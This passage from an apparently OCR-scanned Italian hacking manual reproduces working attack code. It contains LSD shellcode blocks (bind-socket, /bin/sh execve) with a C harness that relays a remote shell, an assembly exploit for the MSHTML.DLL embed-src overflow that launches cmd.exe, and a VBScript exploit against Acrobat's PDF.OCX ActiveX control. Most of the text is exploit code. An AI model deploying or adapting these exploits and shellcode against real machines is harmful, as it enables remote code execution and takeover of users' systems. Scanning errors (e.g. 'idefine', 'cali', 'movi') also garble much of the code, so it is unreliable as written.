"\x57" 


/* 


pushl 


%edi 


*/ 


"\x50" 


/* 


pushl 


%eax 


*/ 


"\x89\xel " 


/* 


movi 


%esp, %ecx 


*/ 


"\xb0\x66" 


/* 


movb 


$0x66, %al 


*/ 


"\x43" 


/* 


incl 


%ebx 


*/ 


"\xcd\x80" 


/* 


int 


$0x80 


*/ 


"\xb0\x66" 


/* 


movb 


$0x66, %al 


*/ 


"\xb3\x04" 


/* 


movb 


$0x04, %bl 


*/ 


"\x89\x44\x24\x04" 


/* 


movi 


%eax, 0x4 (%esp) 


*/ 


"\xcd\x80" 


/* 


int 


$0x80 


*/ 


"\x33\xc0" 


/* 


xorl 


%eax, %eax 


*/ 


"\x83\xc4\x0c" 


/* 


addi 


$Ox0c, %esp 


*/ 


"\x50" 


/* 


pushl 


%eax 


*/ 


"\x50" 


/* 


pushl 


%eax 


*/ 


"\xb0\x66" 


/* 


movb 


$0x66, %al 


*/ 


"\x43" 


/* 


incl 


%ebx 


*/ 


"\xcd\x80" 


/* 


int 


$0x80 


*/ 


"\x89\xc3 " 


/* 


movi 


%eax, %ebx 


*/ 


"\x31 \xc9" 


/* 


xorl 


%ecx, %ecx 


*/ 


"\xbl\x03" 


/* 


movb 


$0x03, %cl 


*/ 


"\x31\xc0" 


/* 


xorl 


%eax, %eax 


*/ 


"\xb0\x3f" 


/* 


movb 


$0x3f, %al 


*/ 


"\x49" 


/* 


deci 


%ecx 


*/ 


"\xcd\x80" 


/* 


int 


$0x80 


*/ 


"\x41" 


/* 


incl 


%ecx 


*/ 


"\xe2\xf6" 


/* 


loop 


<bindsckcode+63> 


*/ 



idefine FINDSCKPORTOFS 46 
idefine BINDSCKPORTOFS 06 

#endif 



BeOS/x86 codes, file: x86-beos 
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execv x03f ret, anum=l,-> [->path="/bin//sh"] , 0 

execv x03f ret, anum=3 ,-> [->path=" /bin//sh" , ->al="-c" , ->a2=cmd] , 0 

*/ 



iif defined(X86) SS defined (BEOS) 



char shellcode[] = 


/* 


25 bytes 


*/ 


"\x31\xc0" 


/* 


xorl 


%eax, %eax 


*/ 


"\x50" 


/* 


pushl 


%eax 


*/ 


"\x68 " "//sh " 


/* 


pushl 


$0x68732f2f 


*/ 


"\x68 " "/bin " 


/* 


pushl 


$0x6e69622f 


*/ 


"\x54" 


/* 


pushl 


%esp 


*/ 


"\x89\xe3" 


/* 


movi 


%esp, %ebx 


*/ 


"\x50" 


/* 


pushl 


%eax 


*/ 


"\x53" 


/* 


pushl 


%ebx 


*/ 


"\x6a\x01 " 


/* 


pushb 


$0x01 


*/ 


"\x50" 


/* 


pushl 


%eax 


*/ 


"\xb0\xa2" 


/* 


movb 


$0xa2, %al 


*/ 


"\xcd\x25" 


/* 


int 


$0x25 


*/ 



cmdsh eli code [ ] = 


/* 


44+cmdlen bytes 


*/ 


\xeb\x25" 


/* 


jmp 


<cmdshellcode+39> 


*/ 


\x59" 


/* 


popi 


%ecx 


*/ 


\x31\xc0" 


/* 


xorl 


%eax, %eax 


*/ 


\x50" 


/* 


pushl 


%eax 


*/ 


\x68 " "//sh " 


/* 


pushl 


$0x68732f2f 


*/ 


\x68 " "/bin " 


/* 


pushl 


$0x6e69622f 


*/ 


\x89\xe3" 


/* 


movi 


%esp, %ebx 


*/ 


\x50" 


/* 


pushl 


%eax 


*/ 


\x66\x68 « "-c" 


/* 


pushw 


$0x632d 


*/ 


\x89\xe7" 


/* 


movi 


%esp, %edi 


*/ 


\x51 " 


/* 


pushl 


%ecx 


*/ 


\x57" 


/* 


pushl 


%edi 


*/ 


\x53" 


/* 


pushl 


%ebx 


*/ 


\x89\xe3" 


/* 


movi 


%esp, %ebx 


*/ 


\x50" 


/* 


pushl 


%eax 


*/ 


\x53" 


/* 


pushl 


%ebx 


*/ 


\x6a\x03" 


/* 


pushb 


$0x03 


*/ 


\x50" 


/* 


pushl 


%eax 


*/ 


\xb0\xa2" 


/* 


movb 


$0xa2, %al 


*/ 


\xcd\x25" 


/* 


int 


$0x25 


*/ 


\xe8\xd6\xff\xff\xff" 


/* 


cali 


<cmdshellcode+2> 


*/ 



/* command */ 



char jump[] = 

"\x8b\xc4" /* movi %esp, %eax */ 

"\xc3" /* ret */ 



Programma d'esempio legati all'uso dei codici 



K.1 asmcodes.h 



Hfndef ASMCODES_H 


gdefine ASMCODES_H 


^include 


"mips—irix" 


iinclude 


" sparc-solaris " 


iinclude 


"parisc—hpux " 


iinclude 


"powerpc—aix " 


iinclude 


" alpha— ultrix" 


iinclude 


"x86—beos " 


iinclude 


"x86-bsd" 


iinclude 


"x86— linux" 


iinclude 


"x86-solaris " 


iinclude 


"x86-sco" 


typedef struct{char *n;char *c; }asmcodes_t [9] ; 
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asmcodes_t asmcodes=( 



NULL 



shellcode 
cmdshellcode 



ì, 

}, 
}, 



iif defined (AIX) / / 

{ "syscallcode" , 
ielse 

( "", 
iendif 

{ "shellcode", 

{ "cmdshellcode" 
iif ! defined (BEOS) && ! defined (ULTRIX) 
iif defined (SOLARIS) II defined(SCO) Il 

{ "setuidcode" , setuidcode }, 
iendif 

iif defined (HPUX) 

{ "setresuidcode", setresuidcode }, 
iendif 

iif defined (IRIX) Il defined (AIX) 

{ "setreuidcode" , setreuidcode 
iendif 

{ "chrootcode" , chrootcode 
iif ! defined (OPENSERVER) 



( defined (X86) && ( defined (SOLARIS) Il defined (SCO) ) ) 
syscallcode }, 



defined (LINUX) / / defined (BSD) 



{ "findsckcode", 
ielse 

{ "", 
iendif 

iif ! defined (SCO) 

( "bindsckcode", 
ielse 

{ "", 
iendif 
ielse 

( "", 

{ "", 

{ "", 

{ "", 



findsckcode 



NULL 



bindsckcode 



NULL 



NULL 
NULL 
NULL 
NULL 



), 
}, 
}, 
}, 

} 

ì, 



}, 
}, 
}, 
} 



iendif 

}; 

iif defined (BEOS) Il defined (ULTRIX) 
idefine FINDSCKPORTOFS -1 
idefine BINDSCKPORTOFS -1 
idefine usleep (a) sleep(l) 
iendif 

idefine is(flag) (flagss (l«flag) ) 
idefine block (f lag) (flagsS (l«flag) ) 
idefine code (f lag) asmcodes [flag] . c 

idefine SYSCALL 0 

idefine SHELL 1 

idefine CMD 2 

idefine CRED 3 

idefine CHROOT 4 

idefine FINO 5 

idefine BIND 6 

idefine _REMOTE 9 

typedef struct(char state; char *follow;int flag; }pblock_t [4] ; 



pblock_t 



tab={ 
, "CSRFB " 
, "CSFB" 
, "CS" 
, "CS" 



(1«CRED) }, 

(l«CHROOT) }, 

(1 «FIND ) I (1 «_REMOTE) } , 

(1«BIND) I (1«_REM0TE) } 



}; 



int parseblocks (char *b) ( 

char c,s;int i , flag=0 ; s= (strlen (b) ==1) ; 
while ( (c=*b++) &&*b) ( 

for (i=0; i<4; i++) if (c==tab [i] . state) break; 

if(i==4) return (-1) ; 

if(strchr(tab[i].follow,*b)) f lag / =tab[i] . flag; else return (-1) , 

} 

if(c=='S') flag I = (1«SHELL) ; 

else if (c=='C ) flagl = (l«CMD) ; else return (-1) ; 
return (flag) ; 
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K.2 asmcodes.c 



/*## 


copyright LAST 


STAGE OF DELIRIUM feb 2001 poland * 


■ //lsd-pl.net/ §*/ 


/*## 


unix asmcodes 


testing facility 




#*/ 


/* 


this code provides the capability of testing different assembly code 


*/ 


/* 


blocks in proof of concept codes 




V 


/* 








*/ 


/* 


compi lation: 






*/ 


/* 


(g)cc asmcodes.c -DSYSTEM -DPROCESSOR [-DVERSION] [-lnsl -lsocket] 


*/ 


/* 


platforms : 


files : 


*/ 


/* 


-DIRIX 


-DMIPS 


mips-irix 


*/ 


/* 


-DSOLARIS 


-DSPARC ; 


sparo— solar is 


*/ 


/* 


-DHPUX 


-DPARISC ; 


pari s c-hpux 


*/ 


/* 


-DAIX 


-DPOWERPC -DV41 1-DV42 1-DV43 


powerpc-aix 


*/ 


/* 


-DULTRIX 


-DALPHA 


alpha— ultrix 


*/ 


/* 


-DSOLARIS 


-DX86 


x86-solaris 


*/ 


/* 


-DBEOS 


-DX86 


x86-beos 


*/ 


/* 


-DLINUX 


-DX86 


x86— linux 


*/ 


/* 


-DOPENBSD 


-DX86 


x86-bsd 


*/ 


/* 


-DFREEBSD 


-DX86 


x86-bsd 


*/ 


/* 


-DNETBSD 


-DX86 


x86-bsd 


*/ 


/* 


-DOPENSERVER 


-DX86 


x86-sco 


*/ 


/* 


-DUNIXWARE 


-DX86 


x86-sco 


*/ 



iinclude <sys/types . h> 
iinclude <sys/socket . h> 
#if defined(AIX) 
iinclude <sys/select . h> 
iendif 

iinclude <sys/time.h> 
iinclude <netinet/in . h> 
iinclude <netdb.h> 
iinclude <unistd.h> 
iinclude <stdio.h> 
iinclude <errno.h> 

iinclude "__asmcodes . h" 

int main (int argo, char **argv) { 

char buffer [1024] , *b, *cmd="id" ; 
int i, c, n, flags=—l,port=1234, sck; 
struct hostent *hp; 
struct sockaddr_in adr; 

printf ("copyright LAST STAGE OF DELIRIUM feb 2001 poland / /lsd-pl .net/\n") ; 
printf ( "unix asmcodes testing facility\n\n") ; 

while ( (c=getopt (argc, argv, "b: c:p: ") ) !=-l) { 
switch (c) { 

case 'b ' : flags=parseblocks (optarg) /break; 

case 'c': cmd=optarg; break; 

case 'p ' : port=atoi (optarg) ; break; 

} 

} 

if (flags==-l) { 

printf ("usage : %s -b buffer [-p port] [-c \ "cmd\ " ] \n%s" , argv[0] , 

" where the buffer is composed of one of the following blocks :\n" 
" S Interactive shell\n" 

" C single command (—c \"cmd\", or predefined \"id\")\n" 
" P restore privileges\n" 
" R escape chroot jail\n" 

" F find socket (—p port, or default=1234) \n" 
" B bind socket (same as for F)\n\n" 
" valid blocks combinations :\n" 

" S PS RS PRS FS BS PFS PBS RFS RBS PRFS PRBS\n" 
" C PC RC PRC FC BC PFC PBC RFC RBC PRFC PRBC\n \n " 
" blocks implemented on this platform:\n " 

); 

for (i=l; i<9; i++) printf ("%s ", asmcodes [i ] . n?asmcodes [i ] .n: " ") ; 
printf ("\n\n example: %s -b PRFS -p 1112\n" , argv [0] ) ; 
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exit (-1) ; 

} 

/* 

* if the find or bind codes are to be tested run simple network daemon 

* simulating a vulnerable application, the simulation is done by the means 

* of reading instructions stream from the network and then executing it. 
*/ 

if(is (_REMOTE) ) { 
if(!fork()){ 

sck=socket (AF_INET, SOCK_STREAM, 0) ; 

adr. sin_family=AF_INET; 

adr. sin_port=htons (port) ; 

adr. sin^addr. s_addr=htonl (INADDR_ANY) ; 

i=l; 

setsockopt (sck, SOL_SOCKET, SO_REUSEADDR, (void*) Si, sizeof(i) ) ; 
if (bind(sck, (struct sockaddr*) Sadr, sizeof (struct sockaddr_in) ) <0) { 
perror ( "error") ; exit (-1) ; 

} 

listen (sck, 1) ; 

if ( (i=accept (sck, (struct sockaddr*) 0, (int*) 0) ) ==-1) exit(-l); 
dose (sck) ; sck=i; 

read (sck, buffer, sizeof (buffer) ) ; 

usleep (500000) ; 

if (block (BIND) ) dose (sck) ; 

§if defined(AIX) 
{ 

int jump[2] = { (int)buffer, * ( (int*) Smain+1) ); 
sleep(l) ; 

((*(void (*) ())jump) ()); 
} 

#else 

usleep (100000) ; 

( (* (void (*) ())buffer) () ) ; 

iendif 

exit (-1) ; 

} 

sleep(l) ; 

} 

/* 

* if this is remote code test, connect to the remote server, which 

* simulates vulnerable aplication. 
*/ 

if(is (_REMOTE) ) { 

sck=socket (AF_INET, SOCK_STRERM, 0) ; 
adr . sin_family=AF_INET; 
adr. sin_port=htons (port) ; 

if( (adr. sin_addr . s_addr=inet_addr ("127.0.0.1") )==-l) { 
if( (hp=gethostbyname ("127.0.0.1")) ==NULL) { 

errno=EADDRNOTAVAIL ; perror ( "error ") ; exit (-1 ) ; 

) 

memcpy (Sadr . sin_addr . s^addr, hp->h_addr, 4) ; 

} 

if (connect (sck, (struct sockaddr*) Sadr, sizeof (struct sockaddr_in) ) <0) { 
perror ( "error ") ; exit (-1) ; 

} 

} 

/* 

* separate code pieces are combined into one block in the target buffer. 

* for the findsckcode the locai port of the connection established with 

* a "vulnerable" server must be obtained. for bindsckcode the number 

* of port to which the listening socket is to be bound must be specified. 
*/ 

b=buffer; 

if (code (SYSCALL) !=NULL) { 

for (i=0; Kstrlen (code (SYSCALL) ) ; i++) *b++=code (SYSCALL) [i ] ; 

} 

if (block (CRED) ) ( 

for (i=0; Kstrlen (code (CRED) ) ; i++) *b++=code (CRED) [i] ; 

) 



if (block (CHROOT) ) { 

for (i=0; Kstrlen (code (CHROOT) ) ; i++) *b++=code (CHROOT) [i ] ; 
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±=sizeof (struct sockaddr_in) ; 

if (getsockname (sck, (struct sockaddr*) &adr, &i)==-l) { 

struct {unsigned int maxlen ; unsigned int len; char *buf;}nb; 
ioctl(sck, (('S'«8) 12), "sockmod"); 
nb . maxlen=Oxffff; 

nb. len=sizeof (struct sockaddr__in) ; ; 
nb.buf= (char*) &adr; 
ioctlfsck, (CT'«8) 1144) , &nb) ; 

} 

n=ntohs (adr.sin _port) ; 

code (FIND) [FINDSCKPORTOFS+0 ] = ( unsigned char) ( (n»8) SOxff) ; 
code (FIND) [FINDSCKPORTOFS+1] = (unsigned char) (n&Oxff); 
for (i=0; i<strlen (code (FIND) ) ; i++) *b++=code (FIND) [i ] ; 

} 

if (block (BIND) ) { 
n=port; 

code (BIND) [BINDSCKPORTOFS+0] = (unsigned char) ( (n»8) SOxff ) ; 
code (BIND) [BINDSCKP0RT0FS+1] = (unsigned char) (n&Oxff); 
for (i=0; i<strlen (code (BIND) ) ; i++) *b++=code (BIND) [i ] ; 

} 

if (block (SHELL) ) { 

for (i=0; Kstrlen (code (SHELL) ) ; i++) *b++=code (SHELL) [i] ; 

} 

if (block (CMD) ) { 

for (i=0; Kstrlen (code (CMD) ) ; i++) *b++=code (CMD) [i ] ; 
for (i=0 ; i<strlen (cmd) ; i++) *b++=cmd [ i ] ; 

} 

*b=0; 
/* 

* the portion of code simulating a "vulnerability" in a program, which 

* is to be exploited locally 
*/ 

if(!is (^REMOTE) ) { 
#if defined(AIX) 
{ 

int jump [2] = { (int) Sbuffer, * ( (int*) imain+1) } ; 
sleep(l) ; 

((*(void (*) ())jump) ()); 
} 

ielse 

§if defined (ULTRIX) 

( (* (void (*) () ) (unsigned long long) strdup (buffer) ) () ) ; 

ielse 

usleep (100000) ; 

( ( * (void (*)()) buffer) () ) ; 

iendif 
iendif 

exit (-1) ; 

} 

/* 

* for remote test, send buffer via network socket to a simple daemon. 

* do bind reconnection whereas needed. if remote shell gets executed, 

* read commands from user, feed them to the shell and show their results. 
*/ 

write (sck, buffer, strlen (buffer) +1) ; 

if (block (BIND) ) { 
dose (sck) ; 
sleep(2) ; 

sck=socket (AF_INET, SOCK_STREAM, 0) ; 
adr. sin port=htons (n) ; 

if (connect (sck, (struct sockaddr*) Sadr, sizeof (struct sockaddr_in) ) <0) { 
per r or ( "error ") ; exit (-1) ; 

} 

} 

if (block (FIND) ) { 
sleep(l) ; 

} 

write (sck, "uname -a \n ", 9) ; 
while(l) { 

fd_set fds; 

FD_ZERO(&fds) ; 
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if (select (FD_SETSIZE, Sfds, NULL, NULL, NULL) ) { 
int cnt; 
char buf [1024]; 
if (FD_ISSET (0 , Sfds) ) { 

if( (cnt=read(0, buf, 1024) )<1) { 

if(errno==EWOULDBLOCKI / errno==EAGAIN) continue; 
else break; 

} 

write (sck, buf, cnt) ; 

} 

if(FD_ISSET(sck, Sfds) ) { 

if ( (cnt=read(sck, buf , 1024) ) <1) { 

if(errno==EWOULDBLOCKI / errno==EAGAIN) continue; 
else break; 

} 

write (l,buf, cnt) ; 

} 

} 

} 

exit (0) ; 



Buffer Overf low in MSHTML.DLL 
Indovinate dove si rova un buffer overflow ? 

Dentro alla DLL che gestisce l'interprete Micrsoft di HTML ovvero la DLL MSHTML.DLL. 
In altre parole se viene fornito all'interprete uno statement del tipo : 

<embed src="filename.AAAAAAAAAA<un certo numero di 'A'>"> 

l'indirizzo di ritorno viene sovrascritto dalla translazione in UNICODE di AAAA ovvero 
0x41004100. 

Il buffer overflow avviene quando l'interprete cerca di concatenare l'estensione del file con 

"Software\Microsoft \Internet Explorer\EmbedExtnToClsidMappingOverride\ " 

tramite la funzione C wcscat(). 

Esiste un altro problema nel sistema di validazione e precisamente in quello che controlla se 
esiste un estensione. 

Esistono comqunue tre problemi specifici nella scritura dell'exploit e precisaente : 

I Tutti i dati vengono convertiti in UNICODE e cioè le A vengono convertite in 0x0041 . 

2. L'indirizzo della shell code potrebbe essere differente in base al numero di finestre aperte 
3 Ci sono differenti offset di EIP salvati all'interno dello stack quando la versione di Internet 
Explorer è precedente e posteriore alla IE5.5SP2. 

II primo problema ci insegna a bypassarlo CodeRed ovvero è sufficiente passare già lo shell 
code in UNICODE per evitare la routine di conversione. 

Il secondo problema è bypassabile facendo si che l'indirizzo che andiamo a sovrascrivere è di 
fatto di una routine presente in una DLL in memoria a cui sarà possibile saltare indietro 
mediante EBP o ESP. 

Abbiamo trovato un istruzione "jmp esp" (FFE4) in tutte le versioni di kernel32.dll e anche 
dentro ad una versione di msvcrt.dll (6.1 0.8924.0). 

Questa versione di DLL non dipende da Internet Explorer ed è presente in qualsiasi 
installazione Windows. 

Il terzo problema è possibile bypassarlo mediante la sovrascrittura dei vari EIPs salvati nello 
stack, usando un certo numero di noops e 

cali xxxx 
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xxxx ; 
pop ebp 

Se vi ricordate quando abbiamo parlato dei buffer overflow uno dei problemi era quello dato 
dalla presenza di 0. 

Qui non dobbiamo preoccuparci in quanto il tutto è già fornito come UNICODE. 
Qui a seguito è riportato una shel code con degli effetti visuali. 



matrix . asm - source code for matrix.htm 
build: 

tasm matrix . asm /m.2 

tlink matrix. db j , matrix.htm /t /3 

Authors : 

ERROR: bug discovery 
3APA3A: idea and coding 

OFFliner : matrix effects and undocumented Windows API 

Thanx to Andrey Kolishak for indirect esp jump idea 

you can obtain matrix screensaver from 
http : //www . security . nnov . ru/matrix 



; eipjmp: overwrites saved EIP for ali versions of 
; mshtml . dll 

; espjmp: gets control after jmp esp and calls codel 
; codel: restores EIP from stack after cali to ebp 
; does some actions and jumps to code2 
; code2 : does the rest of actions 

datap equ (DataTable+080h) 
hKernel32 equ LoadL-datap 
cCur equ StringTable-datap 
SetCCH equ StringTable+4 -datap 
GetSH equ StringTable+8 -datap 
Sleep equ StringTable+12-datap 
WriteC equ StringTable+16-datap 
AllocC equ StringTable+20 -datap 
SetCDM equ StringTable+24 -datap 
SetCTA equ StringTable+28 -datap 
SetCCI equ StringTable+32 -datap 
WinE equ StringTable+36-datap 
ExitP equ StringTable+4 0 -datap 

hStdOut equ StringTable+48-datap 
dwOldMode equ cCur 
conCur equ StringTable+52 -datap 
cls equ StringTable+56-datap 
DWNumChar equ StringTable+60 -datap 
RegHK equ user-datap 

386 

_faked segment para public 'CODE' use32 
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start : 






_faked ends 






_main segment para public 'DATA ' use32 






assume cs :_main 






prefix : 






begin db Offh, Ofeh ; Unicode prefix 






db "<", 0, "e", 0, "m", 0, "b", 0, "e", 0, 


"d", 0, 


Odh, 0 


db "s", 0, "r", 0, "c", 0, "=", 0,34, 0 






db "h ", 0, "t", 0, "t ", 0, "p ", 0, " : ", 0, 


"/", o, 


"/", o 


db "w", 0, "w", 0, "w", 0, ". ", 0 






db 






"s", 0, "e", 0, "c", 0, "u", 0, "r", 0, "i", 0, "t", 0, "y", 0, " 


■ ", o 




db "n", 0, "n", 0, "o", 0, "v", 0, ". ", 0, 


"r", 0, 


"u", 0 


db "/", 0, "f", 0, "i ", 0, "1 ", 0, "e ", 0, 


"s",0, 


"/",0 


db "i ", 0, "e", 0, "b", 0, "o", 0, "/", 0, 


"X", 0 




db " ! (c)3APA3A" 






db 22 dup(090h) 






codel : 






pop ebp 






mov esp, ebx 






xor eax, eax 






dataoffset = DataTable - code2 






ebpdiff = 80h + dataoffset 






mov ax, ebpdiff 






add ebp, eax ;ebp points to data 






lea eax, [ebp+user-datap] 






push eax 






mov ebx, [ebp+LoadL-datap] 






mov eax, [ebx] 






mov [ ebp+LoadL-datap ] , eax 






cali eax ; LoadLibraryA ( "user32 .dll") 






lea ebx, [ebp+reg-datap] 






push ebx 






push eax 






mov ebx, [ebp+GetPA-datap] 






mov eax, [ebx] 






mov [ ebp+GetPA-datap ] , eax 






cali eax ; GetProcAddress ( . , "RegisterHotKey") 




mov [ ebp+RegHK] , eax 






lea edi, [ebp+rhk-datap] 






movzx esi,byte ptr[edi] 






LoopHotkey : 






ine edi 






xor eax, eax 






mov al, [edi ] 






push eax 






ine edi 






mov al, [edi ] 






push eax 






ine edi 






mov al, [edi ] 






push eax 






xor eax, eax 






push eax 






cali [ebp+RegHK] 






dee esi 






or esi, esi 
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lea eax, [ebp+StrlngTable-datap] ; string "kernel32.dll" 
push eax 

cali [ebp+LoadL-datap] ; LoadLlbraryA ( "kernel32 . dll ") 
mov [ebp+hKernel32] , eax ;hKernel32 = 

lea eax, [ebp+SetCCH] 
mov [ebp+cCur] , eax ;*cCur = SetCCH 
lea edi, [ebp+funcnum-datap] 
movzx esl,byte ptr[edi] ; esi=funcnum 
ine edi 
LoopResolve : 

push edi 

push dword ptr [ebp+Hkernel32] 

cali [ebp+GetPA-datap] ; GetProcAddress (edi) 

mov ebx, [ebp+cCur] 

mov [ebx], eax ; sa ve fune address 

xor ecx, ecx 

mov ci, 4 

add ebx, ecx 

mov [ ebp+cCur ] , ebx ; cCur+=4 

not ecx 

xor eax, eax 

repnz scasb ; find \0 

dee esi 

or esi, esi 

jnz LoopResolve 



cali [ebp+AllocC] ; AllocConsole () 
push eax ; nonzero if succeed 
xor eax, eax 
push eax 

cali [ebp+SetCCH] ; SetConsoleCtrlHandler (NULL, TRUE) 
xor eax, eax 
not eax 
sub al, OAh 
push eax 

cali [ebp+GetSH] ; GetStdHandle (STD_OUTPUT_HANDLE) 

mov [ ebp+hStdOut ] , eax ; hStdOut= 

lea eax, [ebp+dwOldMode] 

push eax 

xor ebx, ebx 

ine ebx 

push ebx 

push dword ptr [ebp+hStdOut] 

cali [ebp+SetCDM] ; SetConsoleDisplayMode (hStdOut, 1, 
SdwOldMode) 

xor ebx, ebx 
mov bl, OAh 
push ebx 

push dword ptr [ebp+hStdOut] 
cali [ebp+SetCTA] 

; SetConsoleTextAttribute (hSt dOut , FOREGROUND_ INTENSITY j FOREGROUND_ GREE 
N) 

xor ebx, ebx 

mov [ebp+ConCur+4] , ebx ; ConCur .bVisible = 100 
mov bl, 100 

mov [ebp+ConCur] , ebx ; ConCur . dwSize = 0 
lea eax, [ebp+ConCur] 
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push dword ptr [ebp+hStdOut] 

cali [ebp+SetCCI] ; SetConsoleCursorlnfo (hstdOut, SConCur) 
xor eax, eax 
mov ax, 1000 
push eax 

cali [ebp+Sleep] ; Sleep (1000) ; 

xor ebx, ebx 

mov bl, string-datap 

mov eax, ebp 

add eax, ebx 

mov [ebp+cCur] , eax ; cCur = strlng 
mov eax, ebp 

mov bx, datap-empty_strlng 
sub eax, ebx 

mov [ebp+cls] , eax ; set address of empty_string 
L00P1: ;do do 

xor eax, eax 
push eax 

lea ebx, [ebp+DWNumChar] 
push ebx 
ine eax 
push eax 

mov eax, [ebp+cCur] 
push eax 

push dword ptr [ebp+hStdOut] 

cali [ebp+WriteC] 
; WriteConsole (hStdOut, (void*) cCur, 1, &DWNumChar, NULL) ; 

xor eax, eax 

mov al, 100 

mov ecx, [ebp+cCur] 

mov bl, [ecx] 

sub bl, 20 

jnz NI 

mov ax, 400 
Ni : mov bl , [ecx ] 

sub bl, 8 

jnz N2 

mov ax, 2100 
N2 : push eax 

cali [ebp+Sleep] ; Sleep ( (*cCur== ' 
') 7400: (*cCur==' \b') 72100:100) 

mov ecx, [ebp+cCur] 

ine ecx 

mov [ebp+cCur ] , ecx ; ++cCur 
mov bl, [ecx] 
sub bl, 9 

jnz L00P1 ; whi 1 e ( *cCur ! = ' \ t ' ) ; 
cali [ebp+cls] 
mov ecx, [ebp+cCur] 
ine ecx 

mov [ebp+cCur ] , ecx ; ++cCur 
mov bl, [ecx] 
sub bl, OOAh 

jnz L00P1 ;while (*cCur!= ' \n ') ; 
ine ecx 
xor eax, eax 
push eax 

lea ebx, [ebp+DWNumChar] 
push ebx 
mov al, 18 
push eax 
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push ecx 

push dword ptr [ebp+hStdOut] 
jmp code2 



codelength = $ - begin 
neednoops = ld4h - codelength 

db neednoops dup (090h) 

eipjmp : 

dd 78024e02h 
dd 78024e02h 
dd 78024e02h 
dd 78024e02h 
dw 9090h 

dd 78024e02h ;EIP for IE < 55SP2 

espjmp : 

db 18 dup(090h) 
xor eax,eax ;ESP comes here 
mov ax, 01 7 Oh 
mov ebx, esp 
sub ebx, eax 
cali ebx 

code2 : 

cali [ebp+WriteC] 

xor eax, eax 

mov ax, 4000 

push eax 

cali [ebp+Sleep] 

cali [ebp+cls] 

lea eax, [ebp+cmdexe-datap] 

push eax 

push eax 

cali [ebp+WinE] 

xor eax, eax 

push eax 

cali [ebp+ExltP] 

empty_strlng : 

; some code can be pasted here 
xor eax, eax 
mov ax, 1000 
push eax 

cali [ebp+Sleep] ;Sleep(1000) 
xor eax, eax 
push eax 

lea ebx, [ebp+DWNumChar] 
push ebx 
mov al, 30 
push eax 

lea eax, [ebp+empty-datap] 
push eax 

push dword ptr [ebp+hStdOut] 

cali [ebp+WriteC] 

ret 
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DataTable : 




LoadL dd 780330d0h ; LoadLibraryA import table entry 


GetPA dd 780330cch ; GetProcAddress import table entry 


StringTable : 




db 


"kernel32.dll", 0 


funcnum db 


10 


db 


"SetConsoleCtrlHandler" , 0 


db 


"GetStdHandle", 0 


db 


"Sleep", 0 


db 


"WriteConsoleA", 0 


db 


"AllocConsole", 0 


db 


"SetConsoleDisplayMode" , 0 


db 


"SetConsoleTextAttribute", 0 


db 


"SetConsoleCursorlnfo", 0 


db 


"WinExec", 0 


db 


"ExitProcess", 0 


user db "user32 .dll" , 0 


reg db "RegisterHotKey", 0 


cmdexe db 


"cmd. exe", 0 


rhk db 5 




db 


9, 1, 100, Olbh, 1, 101, 13, 1, 102, 05dh, 8, 103, 3, 2,104 


empty db OOdh, 28 dup (020h) , OOdh, 0 


string db OOdh, " Wake Up, Neo. . . ", OOdh, 009h, 0 


db 


OOdh, " The Matrix has you. . . ", OOdh, 009h, 0 


db 


OOdh, " Follow the White 


Rabbit . ", OOdh, 008h, 009h, OOah, 0 


db 


OOdh, " Knock, knock. . . ", OOdh, 0 


padding db 


32 


suffix : 




db 


34, 0, ">", 0, OOah 


copy db " (c) 2002 by 3APA3A, ERRor, OFFLiner" 


_main ends 







Buf f ers Overf low a vari componenti di W indows 

Esistono diversi OCX in ambiente WINDOWS che possiedono dei bugs che li rendono 
suscettibili di buffer overflow. 

Acrobat Control for ActiveX - PDF.OCX (v1 .3.1 88) 
Setupctl 1 .0 Type Library - SETUPCTL.DLL (v1 , 1 , 0, 6) 
EYEDOG OLE Control module - EYEDOG.OCX (v1 .1 .1 .75) 
MSN ActiveX Setup BBS Control - SETUPBBS.OCX (v4.71.0.10) 
hhopen OLE Control Module - HHOPEN.OCX (v1 ,0,0,1) 
RegWizCtrl 1 .0 Type Library - REGWIZC.DLL (v3, 0, 0, 0) 

I vari exploits sono relativi a codici HTML, quindi fate vuoi a fantasia. 
Negli esempi qello che si esegue è il solito calcolatore. 

PDF 

<object classid="clsid:CA8A9780-280D-1 1 CF-A24D-444553540000" 
id="pdf"x/object> 
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<script language="VBscript"><!- 

msgbox("Adobe Acrobat OCX Buffer Overrun" + Chr(10) + "Written by Sharie 
Hird") 

expstr = 

"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 

AAAAAAAAAAAAAAAAAAAAAAAA" 

expstr = expstr + Chr(235) 'Address in SHELL32, Win98 (7FD035EB) of JMP ESP 
expstr = expstr + Chr(53) 'You may need to use a different address 
expstr = expstr + Chr(208) 
expstr = expstr + Chr(1 27) 

'Stack is slightly trashed, but NOPs fix it up ok 

expstr = expstr + Chr(144) + Chr(144) + Chr(144) + Chr(144) + Chr(144) 
'MOV EDI, ESP 

expstr = expstr + Chr(139) + Chr(252) 

'ADD EDI, 19 (Size of code) 

expstr = expstr + Chr(131) + Chr(199) + Chr(25) 

'PUSH EAX (Window Style EAX = 1) 
expstr = expstr + Chr(80) 

'PUSH EDI (Address of command line) 
expstr = expstr + Chr(87) 

'MOV EDX, BFFA0960 (WinExec, Win98) 

expstr = expstr + Chr(186) + Chr(96) + Chr(9) + Chr(250) + Chr(191) 
'CALL EDX 

expstr = expstr + Chr(255) + Chr(210) 
'XOR EAX, EAX 

expstr = expstr + Chr(51 ) + Chr(1 92) 
'PUSH EAX 

expstr = expstr + Chr(80) 

'MOV EDX, BFF8D4CA (ExitProcess, Win98) 

expstr = expstr + Chr(1 86) + Chr(202) + Chr(21 2) + Chr(248) + Chr(1 91 ) 
'CALL EDX 

expstr = expstr + Chr(255) + Chr(210) 

'Replace with any command + 0 (automatically appended) 
expstr = expstr + "CALC.EXE" 

'Cali exploitable method 
pdf.setview(expstr) 

-></script> 
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SETUPCTL 

<object classid="clsid:F72A7B0E-0DD8-1 1 D1 -BD6E-00AA00B92AF1 " id = 

"setupctl"> 

</object> 

<script language="vbscript"><!- 

msgbox("Setupctl 1 .0 Type Library Buffer Overrun" + Chr(10) + "Written by 
Sharie Hird") 

